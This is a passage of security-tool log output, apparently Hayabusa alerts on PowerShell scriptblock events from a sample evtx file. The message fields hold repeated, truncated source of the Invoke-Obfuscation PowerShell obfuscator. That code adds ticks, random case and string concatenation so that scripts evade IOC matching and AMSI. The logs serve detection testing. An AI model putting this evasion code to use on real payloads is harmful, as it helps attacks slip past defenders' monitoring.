ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. $SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedMemberTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Member token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1}} C:\PS> $ScriptString [console]::('wR'+'It'+'eline').Invoke('Hello World!'); [console]::('wrItEL'+'IN'+'E').Invoke('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If($Tokens[$i].Type -eq 'Member') {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2}} C:\PS> $ScriptString [console]::(""{0}{2}{1}""-f 'W','ITEline','r').Invoke('Hello World!'); [console]::(""{2}{1}{0}"" -f 'liNE','RITE','W').Invoke('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Member' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. $SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken 